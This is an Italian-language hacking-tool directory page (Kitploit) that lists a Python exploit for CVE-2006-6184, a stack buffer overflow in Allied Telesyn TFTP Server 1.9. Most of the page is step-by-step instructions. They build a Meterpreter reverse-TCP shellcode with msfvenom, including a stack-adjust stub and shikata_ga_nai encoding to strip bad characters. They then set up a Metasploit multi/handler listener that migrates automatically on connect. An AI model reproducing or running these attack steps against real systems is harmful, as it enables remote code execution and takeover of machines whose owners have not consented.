Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2006-6184 — Questo è un exploit standalone basato su Python per CVE-2006-6184. Questo exploit innesca dei buffer overflow basati sullo stack in Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possibilmente versioni precedenti, consentendo a un attaccante remoto di causare un denial of service o eseguire codice arbitrario. | Kitploit
Strumenti/GitHubGitHub/shauntdergrigorian/cve-2006-6184
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingStrumento di Accesso RemotoBinary Exploitation
GitHubshauntdergrigorian/cve-2006-6184

cve-2006-6184

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
11715 anni faNon ancora revisionato

Informazioni

Questo è un exploit standalone basato su Python per CVE-2006-6184. Questo exploit innesca dei buffer overflow basati sullo stack in Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possibilmente versioni precedenti, consentendo a un attaccante remoto di causare un denial of service o eseguire codice arbitrario.

Condividi

CVE-2006-6184

Questo è un exploit standalone basato su Python per la CVE-2006-6184. Questo exploit innesca un buffer overflow basato su stack in Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possibilmente versioni precedenti, consentendo a un attaccante remoto di causare un denial of service o eseguire codice arbitrario.

Istruzioni (Aggiornate per il 2020)

Il payload deve essere personalizzato per includere il tuo indirizzo IP e la porta in ascolto, quindi dovrai generarlo manualmente. Per farlo, segui i seguenti passaggi:

1.) Inserisci quanto segue per creare un file hex dell'ammontare che deve essere sottratto dallo stack pointer (3500):

root@kitploit:~
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

2.) Successivamente, usa il seguente comando per creare un payload di shell meterpreter staged:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload

3.) Poi, combina i due file che hai appena creato.

root@kitploit:~
cat stackadj payload > shellcode

4.) Infine, eliminiamo i caratteri cattivi.

root@kitploit:~
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python

Inserisci l'output come valore della variabile "payload". Potrebbe essere necessario eseguire questo exploit alcune volte perché funzioni.

Listener Metasploit

  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_nonx_tcp
  3. set ExitOnSession false
  4. set AutoRunScript post/windows/manage/migrate
  5. exploit -j
Scarica lo strumento